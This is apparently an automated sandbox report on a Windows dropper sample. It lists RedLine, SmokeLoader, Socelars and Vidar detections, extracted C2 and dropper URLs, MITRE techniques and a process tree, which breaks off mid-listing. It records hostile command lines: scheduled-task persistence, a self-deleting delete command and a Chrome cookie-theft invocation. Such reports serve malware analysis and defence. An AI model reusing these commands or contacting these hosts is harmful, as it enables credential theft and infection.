redline | a282005eef80a8f19035835337c495306785cd4b6452cff47ea42c89e32f2001

Analysis

max time kernel
12s
max time network
162s
platform
windows10_x64
resource
win10v20210410
submitted
14-08-2021 00:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a128c5bc0609f0871555f4e66bb19717.exe
Size

3.3MB
MD5

a128c5bc0609f0871555f4e66bb19717
SHA1

3b7c2d36a7bd94d6d57c73a1dbfd783948422979
SHA256

a282005eef80a8f19035835337c495306785cd4b6452cff47ea42c89e32f2001
SHA512

328faa0446b56613df66824e4e43a6f6e7e9d093d088433d84f9bf993610c3d40962d5c57cdeec79beda32971c0ff3274d61dba1fcbb424b813edc43e327d031

Score

10^/10

redline smokeloader socelars vidar 706 916 937 aspackv2 backdoor evasion infostealer persistence spyware stealer suricata trojan vmprotect

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://193.56.146.55/Api/GetFile2

Extracted

Family

vidar

Version

Botnet

706

https://lenak513.tumblr.com/

Attributes

profile_id
706

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Extracted

Family

vidar

Version

Botnet

916

https://lenak513.tumblr.com/

Attributes

profile_id
916

Extracted

Family

vidar

Version

Botnet

937

https://lenak513.tumblr.com/

Attributes

profile_id
937

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5832	3516	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6680	3516	rundll32.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4480-277-0x00000000077B0000-0x00000000077E2000-memory.dmp	family_redline
behavioral2/memory/4532-280-0x0000000005450000-0x0000000005482000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\2.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\2.exe	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE GCleaner Downloader Activity M1
suricata: ET MALWARE GCleaner Downloader Activity M1
suricata
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
suricata
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Unknown - Loader - Check .exe Updated
suricata: ET MALWARE Unknown - Loader - Check .exe Updated
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata

Vidar Stealer 6 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/2480-203-0x0000000000B30000-0x0000000000BCD000-memory.dmp	family_vidar
behavioral2/memory/2480-205-0x0000000000400000-0x000000000095B000-memory.dmp	family_vidar
behavioral2/memory/204-340-0x0000000004990000-0x0000000004A2D000-memory.dmp	family_vidar
behavioral2/memory/4764-342-0x00000000049C0000-0x0000000004A5D000-memory.dmp	family_vidar
behavioral2/memory/204-359-0x0000000000400000-0x0000000002D17000-memory.dmp	family_vidar
behavioral2/memory/4764-363-0x0000000000400000-0x0000000002D16000-memory.dmp	family_vidar

ASPack v2.12-2.42 7 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\libcurlpp.dll	aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS8A6BE444\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\libcurl.dll	aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS8A6BE444\libcurl.dll	aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS8A6BE444\libcurl.dll	aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS8A6BE444\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\libstdc++-6.dll	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 26 IoCs

Processes:

setup_installer.exesetup_install.exe6f0ef9103.exe30dd64a3b09404.exea6d6262485.exec65040c72c7.execb4071ec97a2.exeed10a8b2b3d6.exe757755d929c68.exe29dc9096b9.exea6d6262485.tmpcb4071ec97a2.exeLzmwAqmV.exe1642518.exe6326952.exe6493146.exe6911857.exe5323963.exeChrome 5.exe1.exe2.exeWinHoster.exe3.exe4.exe5.exe6.exe

pid	process
1704	setup_installer.exe
2244	setup_install.exe
3948	6f0ef9103.exe
2064	30dd64a3b09404.exe
2348	a6d6262485.exe
1380	c65040c72c7.exe
2284	cb4071ec97a2.exe
2480	ed10a8b2b3d6.exe
2500	757755d929c68.exe
3148	29dc9096b9.exe
2624	a6d6262485.tmp
2196	cb4071ec97a2.exe
4216	LzmwAqmV.exe
4356	1642518.exe
4416	6326952.exe
4480	6493146.exe
4532	6911857.exe
4620	5323963.exe
4708	Chrome 5.exe
4856	1.exe
4964	2.exe
4976	WinHoster.exe
5076	3.exe
4136	4.exe
2968	5.exe
4368	6.exe

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\6f0ef9103.exe	vmprotect
behavioral2/memory/3948-169-0x0000000000400000-0x0000000000759000-memory.dmp	vmprotect
C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\6f0ef9103.exe	vmprotect

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

30dd64a3b09404.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	30dd64a3b09404.exe

Loads dropped DLL 10 IoCs

Processes:

setup_install.exea6d6262485.tmp

pid	process
2244	setup_install.exe
2244	setup_install.exe
2244	setup_install.exe
2244	setup_install.exe
2244	setup_install.exe
2244	setup_install.exe
2244	setup_install.exe
2244	setup_install.exe
2624	a6d6262485.tmp
2624	a6d6262485.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

6326952.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	6326952.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

191 ip-api.com
192 ipinfo.io
200 ipinfo.io
19 ipinfo.io
25 ipinfo.io
40 ipinfo.io
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	ioc
191	ip-api.com
192	ipinfo.io
200	ipinfo.io
19	ipinfo.io
25	ipinfo.io
40	ipinfo.io

Program crash 37 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
5856	4136	WerFault.exe	4.exe
5224	4240	WerFault.exe	7ORakC6ErF6FIDbezAfoevkf.exe
5316	204	WerFault.exe	xgQy9Xqwz2D_OLNULR_T4HUf.exe
3424	4136	WerFault.exe	4.exe
5556	4764	WerFault.exe	frSPUYhlVrEvawc2B8b3SMmm.exe
5780	4136	WerFault.exe	4.exe
1856	4764	WerFault.exe	frSPUYhlVrEvawc2B8b3SMmm.exe
1340	204	WerFault.exe	xgQy9Xqwz2D_OLNULR_T4HUf.exe
5556	4136	WerFault.exe	4.exe
5480	4764	WerFault.exe	frSPUYhlVrEvawc2B8b3SMmm.exe
5220	204	WerFault.exe	xgQy9Xqwz2D_OLNULR_T4HUf.exe
2476	4136	WerFault.exe	4.exe
2504	4764	WerFault.exe	frSPUYhlVrEvawc2B8b3SMmm.exe
6008	204	WerFault.exe	xgQy9Xqwz2D_OLNULR_T4HUf.exe
6032	5736	WerFault.exe	DZJ0O71zywaqbGmJvbKTejMr.exe
5448	204	WerFault.exe	xgQy9Xqwz2D_OLNULR_T4HUf.exe
5748	4136	WerFault.exe	4.exe
3780	5736	WerFault.exe	DZJ0O71zywaqbGmJvbKTejMr.exe
3660	204	WerFault.exe	xgQy9Xqwz2D_OLNULR_T4HUf.exe
6008	4136	WerFault.exe	4.exe
1140	204	WerFault.exe	xgQy9Xqwz2D_OLNULR_T4HUf.exe
6136	4764	WerFault.exe	frSPUYhlVrEvawc2B8b3SMmm.exe
4560	4136	WerFault.exe	4.exe
1568	5736	WerFault.exe	DZJ0O71zywaqbGmJvbKTejMr.exe
6460	5736	WerFault.exe	DZJ0O71zywaqbGmJvbKTejMr.exe
6452	204	WerFault.exe	xgQy9Xqwz2D_OLNULR_T4HUf.exe
6444	4764	WerFault.exe	frSPUYhlVrEvawc2B8b3SMmm.exe
6724	204	WerFault.exe	xgQy9Xqwz2D_OLNULR_T4HUf.exe
6804	5736	WerFault.exe	DZJ0O71zywaqbGmJvbKTejMr.exe
6988	204	WerFault.exe	xgQy9Xqwz2D_OLNULR_T4HUf.exe
7084	5736	WerFault.exe	DZJ0O71zywaqbGmJvbKTejMr.exe
7128	4164	WerFault.exe	8.exe
6424	5736	WerFault.exe	DZJ0O71zywaqbGmJvbKTejMr.exe
6708	4136	WerFault.exe	4.exe
6732	5736	WerFault.exe	DZJ0O71zywaqbGmJvbKTejMr.exe
5532	4136	WerFault.exe	4.exe
4904	4136	WerFault.exe	4.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

c65040c72c7.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	c65040c72c7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	c65040c72c7.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	c65040c72c7.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2380 schtasks.exe
6440 schtasks.exe
7816 schtasks.exe
8008 schtasks.exe
7580 schtasks.exe
Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

6272 timeout.exe
7388 timeout.exe
7544 timeout.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

6504 taskkill.exe
6716 taskkill.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4880 PING.EXE

pid	process
2380	schtasks.exe
6440	schtasks.exe
7816	schtasks.exe
8008	schtasks.exe
7580	schtasks.exe

pid	process
6272	timeout.exe
7388	timeout.exe
7544	timeout.exe

pid	process
6504	taskkill.exe
6716	taskkill.exe

pid	process
4880	PING.EXE

Script User-Agent 6 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	195	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	206	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	20	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	25	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	29	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	35	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 52 IoCs

Processes:

c65040c72c7.exe30dd64a3b09404.exe

pid	process
1380	c65040c72c7.exe
1380	c65040c72c7.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe

Suspicious use of AdjustPrivilegeToken 40 IoCs

Processes:

757755d929c68.exe29dc9096b9.exe1642518.exe2.exe5323963.exe3.exe1.exe

description	pid	process
Token: SeDebugPrivilege	2500	757755d929c68.exe
Token: SeDebugPrivilege	3148	29dc9096b9.exe
Token: SeDebugPrivilege	4356	1642518.exe
Token: SeCreateTokenPrivilege	4964	2.exe
Token: SeAssignPrimaryTokenPrivilege	4964	2.exe
Token: SeLockMemoryPrivilege	4964	2.exe
Token: SeIncreaseQuotaPrivilege	4964	2.exe
Token: SeMachineAccountPrivilege	4964	2.exe
Token: SeTcbPrivilege	4964	2.exe
Token: SeSecurityPrivilege	4964	2.exe
Token: SeTakeOwnershipPrivilege	4964	2.exe
Token: SeLoadDriverPrivilege	4964	2.exe
Token: SeSystemProfilePrivilege	4964	2.exe
Token: SeSystemtimePrivilege	4964	2.exe
Token: SeProfSingleProcessPrivilege	4964	2.exe
Token: SeIncBasePriorityPrivilege	4964	2.exe
Token: SeCreatePagefilePrivilege	4964	2.exe
Token: SeCreatePermanentPrivilege	4964	2.exe
Token: SeBackupPrivilege	4964	2.exe
Token: SeRestorePrivilege	4964	2.exe
Token: SeShutdownPrivilege	4964	2.exe
Token: SeDebugPrivilege	4964	2.exe
Token: SeAuditPrivilege	4964	2.exe
Token: SeSystemEnvironmentPrivilege	4964	2.exe
Token: SeChangeNotifyPrivilege	4964	2.exe
Token: SeRemoteShutdownPrivilege	4964	2.exe
Token: SeUndockPrivilege	4964	2.exe
Token: SeSyncAgentPrivilege	4964	2.exe
Token: SeEnableDelegationPrivilege	4964	2.exe
Token: SeManageVolumePrivilege	4964	2.exe
Token: SeImpersonatePrivilege	4964	2.exe
Token: SeCreateGlobalPrivilege	4964	2.exe
Token: 31	4964	2.exe
Token: 32	4964	2.exe
Token: 33	4964	2.exe
Token: 34	4964	2.exe
Token: 35	4964	2.exe
Token: SeDebugPrivilege	4620	5323963.exe
Token: SeDebugPrivilege	5076	3.exe
Token: SeDebugPrivilege	4856	1.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

a6d6262485.tmp

pid process

2624 a6d6262485.tmp

pid	process
2624	a6d6262485.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

a128c5bc0609f0871555f4e66bb19717.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exea6d6262485.exe757755d929c68.exe29dc9096b9.exe

description	pid	process	target process
PID 3212 wrote to memory of 1704	3212	a128c5bc0609f0871555f4e66bb19717.exe	setup_installer.exe
PID 3212 wrote to memory of 1704	3212	a128c5bc0609f0871555f4e66bb19717.exe	setup_installer.exe
PID 3212 wrote to memory of 1704	3212	a128c5bc0609f0871555f4e66bb19717.exe	setup_installer.exe
PID 1704 wrote to memory of 2244	1704	setup_installer.exe	setup_install.exe
PID 1704 wrote to memory of 2244	1704	setup_installer.exe	setup_install.exe
PID 1704 wrote to memory of 2244	1704	setup_installer.exe	setup_install.exe
PID 2244 wrote to memory of 2728	2244	setup_install.exe	cmd.exe
PID 2244 wrote to memory of 2728	2244	setup_install.exe	cmd.exe
PID 2244 wrote to memory of 2728	2244	setup_install.exe	cmd.exe
PID 2244 wrote to memory of 3960	2244	setup_install.exe	cmd.exe
PID 2244 wrote to memory of 3960	2244	setup_install.exe	cmd.exe
PID 2244 wrote to memory of 3960	2244	setup_install.exe	cmd.exe
PID 2244 wrote to memory of 4016	2244	setup_install.exe	cmd.exe
PID 2244 wrote to memory of 4016	2244	setup_install.exe	cmd.exe
PID 2244 wrote to memory of 4016	2244	setup_install.exe	cmd.exe
PID 2244 wrote to memory of 2120	2244	setup_install.exe	cmd.exe
PID 2244 wrote to memory of 2120	2244	setup_install.exe	cmd.exe
PID 2244 wrote to memory of 2120	2244	setup_install.exe	cmd.exe
PID 2244 wrote to memory of 3324	2244	setup_install.exe	cmd.exe
PID 2244 wrote to memory of 3324	2244	setup_install.exe	cmd.exe
PID 2244 wrote to memory of 3324	2244	setup_install.exe	cmd.exe
PID 2244 wrote to memory of 3292	2244	setup_install.exe	cmd.exe
PID 2244 wrote to memory of 3292	2244	setup_install.exe	cmd.exe
PID 2244 wrote to memory of 3292	2244	setup_install.exe	cmd.exe
PID 2244 wrote to memory of 740	2244	setup_install.exe	cmd.exe
PID 2244 wrote to memory of 740	2244	setup_install.exe	cmd.exe
PID 2244 wrote to memory of 740	2244	setup_install.exe	cmd.exe
PID 2244 wrote to memory of 1172	2244	setup_install.exe	cmd.exe
PID 2244 wrote to memory of 1172	2244	setup_install.exe	cmd.exe
PID 2244 wrote to memory of 1172	2244	setup_install.exe	cmd.exe
PID 2244 wrote to memory of 1304	2244	setup_install.exe	cmd.exe
PID 2244 wrote to memory of 1304	2244	setup_install.exe	cmd.exe
PID 2244 wrote to memory of 1304	2244	setup_install.exe	cmd.exe
PID 4016 wrote to memory of 2064	4016	cmd.exe	30dd64a3b09404.exe
PID 4016 wrote to memory of 2064	4016	cmd.exe	30dd64a3b09404.exe
PID 4016 wrote to memory of 2064	4016	cmd.exe	30dd64a3b09404.exe
PID 2120 wrote to memory of 3948	2120	cmd.exe	6f0ef9103.exe
PID 2120 wrote to memory of 3948	2120	cmd.exe	6f0ef9103.exe
PID 2120 wrote to memory of 3948	2120	cmd.exe	6f0ef9103.exe
PID 3324 wrote to memory of 2348	3324	cmd.exe	a6d6262485.exe
PID 3324 wrote to memory of 2348	3324	cmd.exe	a6d6262485.exe
PID 3324 wrote to memory of 2348	3324	cmd.exe	a6d6262485.exe
PID 3292 wrote to memory of 1380	3292	cmd.exe	c65040c72c7.exe
PID 3292 wrote to memory of 1380	3292	cmd.exe	c65040c72c7.exe
PID 3292 wrote to memory of 1380	3292	cmd.exe	c65040c72c7.exe
PID 3960 wrote to memory of 2284	3960	cmd.exe	cb4071ec97a2.exe
PID 3960 wrote to memory of 2284	3960	cmd.exe	cb4071ec97a2.exe
PID 3960 wrote to memory of 2284	3960	cmd.exe	cb4071ec97a2.exe
PID 740 wrote to memory of 2480	740	cmd.exe	ed10a8b2b3d6.exe
PID 740 wrote to memory of 2480	740	cmd.exe	ed10a8b2b3d6.exe
PID 740 wrote to memory of 2480	740	cmd.exe	ed10a8b2b3d6.exe
PID 1172 wrote to memory of 2500	1172	cmd.exe	757755d929c68.exe
PID 1172 wrote to memory of 2500	1172	cmd.exe	757755d929c68.exe
PID 1304 wrote to memory of 3148	1304	cmd.exe	29dc9096b9.exe
PID 1304 wrote to memory of 3148	1304	cmd.exe	29dc9096b9.exe
PID 2348 wrote to memory of 2624	2348	a6d6262485.exe	a6d6262485.tmp
PID 2348 wrote to memory of 2624	2348	a6d6262485.exe	a6d6262485.tmp
PID 2348 wrote to memory of 2624	2348	a6d6262485.exe	a6d6262485.tmp
PID 2500 wrote to memory of 4216	2500	757755d929c68.exe	LzmwAqmV.exe
PID 2500 wrote to memory of 4216	2500	757755d929c68.exe	LzmwAqmV.exe
PID 2500 wrote to memory of 4216	2500	757755d929c68.exe	LzmwAqmV.exe
PID 3148 wrote to memory of 4356	3148	29dc9096b9.exe	1642518.exe
PID 3148 wrote to memory of 4356	3148	29dc9096b9.exe	1642518.exe
PID 3148 wrote to memory of 4416	3148	29dc9096b9.exe	6326952.exe

C:\Users\Admin\AppData\Local\Temp\a128c5bc0609f0871555f4e66bb19717.exe
"C:\Users\Admin\AppData\Local\Temp\a128c5bc0609f0871555f4e66bb19717.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3212
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1704
- - C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2244
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c APPNAME11.exe
      4⤵
      PID:2728
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c cb4071ec97a2.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3960
    - - C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\cb4071ec97a2.exe
        
        cb4071ec97a2.exe
        5⤵
        Executes dropped EXE
        
        PID:2284
      - C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\cb4071ec97a2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\cb4071ec97a2.exe" -a
        6⤵
        Executes dropped EXE
        
        PID:2196
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 30dd64a3b09404.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4016
    - - C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\30dd64a3b09404.exe
        
        30dd64a3b09404.exe
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious behavior: EnumeratesProcesses
        
        PID:2064
      - C:\Users\Admin\Documents\8mAdeMr9sMdQkjO8zIOnat42.exe
        
        "C:\Users\Admin\Documents\8mAdeMr9sMdQkjO8zIOnat42.exe"
        6⤵
        
        PID:976
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\8mAdeMr9sMdQkjO8zIOnat42.exe"
        7⤵
        
        PID:6276
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        8⤵
        Delays execution with timeout.exe
        
        PID:6272
        
        C:\Users\Admin\AppData\Local\Temp\0daFwwflN0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0daFwwflN0.exe"
        7⤵
        
        PID:4148
        
        C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
        8⤵
        Creates scheduled task(s)
        
        PID:6440
      - C:\Users\Admin\Documents\xgQy9Xqwz2D_OLNULR_T4HUf.exe
        
        "C:\Users\Admin\Documents\xgQy9Xqwz2D_OLNULR_T4HUf.exe"
        6⤵
        
        PID:204
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 204 -s 760
        7⤵
        Program crash
        
        PID:5316
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 204 -s 812
        7⤵
        Program crash
        
        PID:1340
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 204 -s 792
        7⤵
        Program crash
        
        PID:5220
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 204 -s 852
        7⤵
        Program crash
        
        PID:6008
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 204 -s 956
        7⤵
        Program crash
        
        PID:5448
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 204 -s 984
        7⤵
        Program crash
        
        PID:3660
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 204 -s 1048
        7⤵
        Program crash
        
        PID:1140
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 204 -s 1028
        7⤵
        Program crash
        
        PID:6452
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 204 -s 1520
        7⤵
        Program crash
        
        PID:6724
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 204 -s 1596
        7⤵
        Program crash
        
        PID:6988
      - C:\Users\Admin\Documents\J044GfwkAKkZc8wHbv9YcOB9.exe
        
        "C:\Users\Admin\Documents\J044GfwkAKkZc8wHbv9YcOB9.exe"
        6⤵
        
        PID:2704
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        
        PID:6296
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        
        PID:5072
      - C:\Users\Admin\Documents\7ORakC6ErF6FIDbezAfoevkf.exe
        
        "C:\Users\Admin\Documents\7ORakC6ErF6FIDbezAfoevkf.exe"
        6⤵
        
        PID:4240
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4240 -s 480
        7⤵
        Program crash
        
        PID:5224
      - C:\Users\Admin\Documents\frSPUYhlVrEvawc2B8b3SMmm.exe
        
        "C:\Users\Admin\Documents\frSPUYhlVrEvawc2B8b3SMmm.exe"
        6⤵
        
        PID:4764
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 760
        7⤵
        Program crash
        
        PID:5556
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 812
        7⤵
        Program crash
        
        PID:1856
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 848
        7⤵
        Program crash
        
        PID:5480
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 956
        7⤵
        Program crash
        
        PID:2504
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 1444
        7⤵
        Program crash
        
        PID:6136
        
        C:\Windows\SysWOW64\WerFault.exe
        
